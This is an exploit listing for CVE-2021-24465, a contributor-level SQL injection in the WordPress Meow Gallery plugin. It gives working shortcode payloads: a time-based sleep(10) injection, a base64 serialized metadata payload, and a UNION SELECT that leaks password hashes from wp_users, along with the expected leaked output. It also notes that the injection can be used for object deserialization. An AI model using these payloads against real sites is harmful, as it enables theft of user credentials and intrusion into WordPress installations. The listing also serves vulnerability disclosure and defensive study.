Exploit for Meow Gallery < 4.1.9 - Contributor+ SQL Injection CVE-2021-24465

Name: Exploit for Meow Gallery < 4.1.9 - Contributor+ SQL Injection CVE-2021-24465
Rating: 5 (367 reviews)
2021-09-02 | CVSS 5.5
## https://sploitus.com/exploit?id=WPEX-ID:08DBE202-0136-4502-87E7-5E984DC27B16
Simple PoC to prove the SQLi: add the following shortcode in a page/post with a role as low as contributor, then preview/view it and note the 10s delay

[gallery layout="cascade" ids="1) AND (select*from(select(sleep(10)))a"]

-- Reporter PoC:

This SQL injection allows two things: 1) disclosure of arbitrary contents in SQL tables, and 2) deserialization of arbitrary objects.

To prepare for data disclosure, we first need to get serialized version of _wp_attachment_metadata. Of course if you are here for deserialization this can be replaced with serialization gadgets.

This is the JSON I used for this:

{"width":1,"height":1,"file":"a.png","sizes":{"medium":{"file":"a.png","width":1,"height":1,"mime-type":"image/png"},"thumbnail":{"file":"a.png","width":1,"height":1,"mime-type":"image/png"}},"image_meta":{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0","keywords":[]}}

b64 = eyJ3aWR0aCI6MSwiaGVpZ2h0IjoxLCJmaWxlIjoiYS5wbmciLCJzaXplcyI6eyJtZWRpdW0iOnsiZmlsZSI6ImEucG5nIiwid2lkdGgiOjEsImhlaWdodCI6MSwibWltZS10eXBlIjoiaW1hZ2UvcG5nIn0sInRodW1ibmFpbCI6eyJmaWxlIjoiYS5wbmciLCJ3aWR0aCI6MSwiaGVpZ2h0IjoxLCJtaW1lLXR5cGUiOiJpbWFnZS9wbmcifX0sImltYWdlX21ldGEiOnsiYXBlcnR1cmUiOiIwIiwiY3JlZGl0IjoiIiwiY2FtZXJhIjoiIiwiY2FwdGlvbiI6IiIsImNyZWF0ZWRfdGltZXN0YW1wIjoiMCIsImNvcHlyaWdodCI6IiIsImZvY2FsX2xlbmd0aCI6IjAiLCJpc28iOiIwIiwic2h1dHRlcl9zcGVlZCI6IjAiLCJ0aXRsZSI6IiIsIm9yaWVudGF0aW9uIjoiMCIsImtleXdvcmRzIjpbXX19

Which can be base64_encode(serialize(json_decode(PAYLOAD))) ed to get the serialized payload.

Shortcode payload for leaking user's password hashes:
[gallery layout="cascade" ids="1) UNION SELECT id,user_pass,FROM_BASE64('BASE64ED_PAYLOAD_SEE_ABOVE') FROM wp_users WHERE id IN (1,2,3,4"]


This should produce a HTML like (base64ed):
<div class="mgl-row mgl-layout-1-o" data-cascade-layout="o"><div class="mgl-box a"><figure class="mgl-item">
	<div class="mgl-icon">
		<div class="mgl-img-container">
												</div>
	</div>
		<figcaption class="mgl-caption">
			<p>LEAKED PASSWORD HASH/</p>
	</figcaption>
	</figure>
</div></div>